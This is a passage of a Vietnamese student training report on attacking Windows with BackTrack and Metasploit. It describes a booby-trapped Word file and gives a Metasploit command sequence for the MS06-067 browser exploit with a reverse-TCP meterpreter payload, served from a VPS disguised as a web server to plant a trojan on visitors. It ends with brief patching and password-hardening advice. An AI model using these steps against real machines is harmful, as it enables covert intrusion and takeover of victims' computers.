  • 21. Athena Center SVTH: Dương Đình Tú Trang 16 (hình 2.9: Lỗ hổng sử dụng: file WORD phiên bản word 2007) - Sau khi thực hiện các bước trên, chúng ta bắt đầu gửi file word qua cho máy nạn nhân, khi nạn nhân mở file word backtrack sẽ tự động gửi mã độc qua và chúng ta có thể chiếm quyền sử dụng máy nạn nhân (hình 2.10: Lỗ hổng sử dụng: file WORD phiên bản word 2007)
  • 22. Athena Center SVTH: Dương Đình Tú Trang 17 PHẦN 3: XÂY DỰNG HONEYPOT KHAI THÁC XÂM NHẬP LỖ HỔNG TỪ XA QUA MẠNG INTERNET 3.1 Honeypot Honeypot là một hệ thống tài nguyên thông tin được xây dựng với mục đích giả dạng đánh lừa những kẻ sử dụng và xâm nhập không hợp pháp, thu hút sự chú ý của chúng, ngăn không cho chúng tiếp xúc với hệ thống thật. Hệ thống tài nguyên thông tin có nghĩa là Honeypot có thể giả dạng bất cứ loại máy chủ tài nguyên nào như là Mail Server, Domain Name Server, Web Server… Honeypot sẽ trực tiếp tương tác với tin tặc và tìm cách khai thác thông tin về tin tặc như hình thức tấn công, công cụ tấn công hay cách thức tiến hành thay vì bị tấn công. Với mục tiêu xây dựng Honeypot để xâm nhập vào lỗ hổng hệ thống máy tính qua Internet, Hacker có thể sử dụng Máy chủ ảo (VPS) và cài đặt Honeypot để giả dạng là một Web server bình thường, từ đó đánh lừa máy nạn nhân khi một máy tính bất kỳ có kết nối Internet truy cập vào địa chỉ mà VPS cung cấp. 3.2 Sơ đồ tổng quan sử dụng Honeypot để xâm nhập từ xa qua Internet (hình 3.1: sơ đồ tổng quan sử dụng Honepot)
  • 23. Athena Center SVTH: Dương Đình Tú Trang 18 Chúng ta – đóng vài trò là Attacker, cần chuẩn bị: - VPS có địa chỉ IP public, cài đặt sẵn công cụ Metasploit (download tại http://metasploit.org) đóng vai trò là một Honeypot trên mạng. (hình 3.2: Công cụ metasploit)
  • 24. Athena Center SVTH: Dương Đình Tú Trang 19 3.3 Tấn công hệ điều hành Windows XP 3.3.1 Xâm nhập và khai thác hệ thống (hình3.3: Ping đến trang google.com) Lỗ hổng khai thác: Ms 06_067. Điều kiện: Windows XP without service pack, trình duyệt Internet Explorer 6.0 - Tại cửa sổ Metasploit console, ta sử dụng các lệnh sau để tạo một server lắng nghe các sự truy cập từ bên ngoài use exploit/windows/browser/ms06_067_keyframe (Sử dụng lỗi Ms06_067) show options (Xem thông tin thiết đặt) set srvhost ptuananh.tk (VPS được đăng ký domain là http://ptuananh.tk ) set lhost ptuananh.tk
  • 25. Athena Center SVTH: Dương Đình Tú Trang 20 set uripath winxp (Đường dẫn kèm theo Domain, nếu để mặc định, metasploit sẽ chọn ngẫu nhiên đường dẫn bất kỳ) set srvport 80 (Chọn port 80, VPS như một Web Server, tránh sự nghi ngờ của người dùng) set payload windows/meterpreter/reverse_tcp exploit - Công việc tiếp theo là chờ cho máy mục tiêu truy cập vào địa chỉ: http://ptuananh.tk/winxp . Ngay lúc đó, server trên VPS chúng ta sẽ tiến hành gửi trojan về máy mục tiêu. (hình3.4 gửi Trojan về máy mục tiêu)
  • 26. Athena Center SVTH: Dương Đình Tú Trang 21 - Bây giờ ta có thể tiến hành khai thác tại máy mục tiêu: b) Phương pháp khắc phục lỗ hổng Để khắc phục lỗ hổng Ms06_067, máy tính người dùng cần cập nhật các bản Service pack (1 hoặc 2 hoặc 3) của Microsoft dành cho Windows XP. (Hình 3.5: Khai thác thông tin từ máy mục tiêu)
  • 27. Athena Center SVTH: Dương Đình Tú Trang 22 PHẦN 4: TỔNG KẾT Với những kiểu tấn công hệ thống dựa trên những lỗi sai sót trong quá trình sửdụng máy tính hoặc các lỗi về bảo mật vật lý, có một số phương pháp nhằm giảm thiểu và phòng tránh việc Hacker đánh cắp Mật khẩu nhưsau: Mật khẩu phải được đặt nhiều hơn 8 ký tựvà phải là tổng hợp giữa chữhoa, chữ thường, số và ký tựđặc biệt để các chương trình khó dò ra. Cấu hình trong registry cho mật khẩu trong hệ thống windows chỉ được băm và lưu dưới dạng NTLM để các chương trình khó khăn để dò tim. Bật lên 1 ởkhóa: HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsaNoLMHash Người dùng admin nên xóa tập tin sam trong thưmục Windows/repair sau mỗi lần backup dữliệu bằng rdisk. Trong quá trình sử dụng máy tính để truy cập Internet, người dùng cần lưu ý: Không mởtập tin đính kèm thưđiện tửcó nguồn gốc không rõ ràng hoặc không tin cậy. Chắc chắn rằng bạn có và đã bật hệ thống tường lửa cho hệ thống của mình. Đảm bảo Windows của bạn được cập nhật thường xuyên, phần mềm bảo mật của bạn có chức năng cập nhật "live" (tựđộng cập nhật trực tuyến). Microsoft đã xây dựng một loạt các công cụ trong Windows để các nhà quản trị cũng như người dùng có kinh nghiệm có thể phân tích chiếc máy tính của mình xem liệu nó có đang bị xâm phạm hay không. Một khi nghi ngờ máy tính của mình bị xâm nhập, người dùng có thể sử dụng các công cụ này để tự kiểm tra máy tính của mình khi có những biểu hiện đáng ngờ: WMIC, Lệnh net, Openfiles, Netstat, Find.
  • 28. Athena Center SVTH: Dương Đình Tú Trang 23 DANH MỤC TÀI LIỆU THAM KHẢO 1. Nguyễn Sơn Khê, Đỗ Tấn Phát, Nguyễn Cao Thắng, Athena-Su dung BackTrack 5 khai thác lỗ hổng mạng. 2. http://www.hackyshacky.com/2013/03/how-to-hack-facebook-with-backtrack- 5.html 3. https://www.youtube.com/watch?v=_AKCmLvN1Sg 4. http://suamaytinhtainha.info/thu-thuat-may-tinh/cach-hack-may-tinh-trong- mang-lan-bang-backtrack-5.html 5. https://www.youtube.com/watch?v=gqrEZ7n1Gns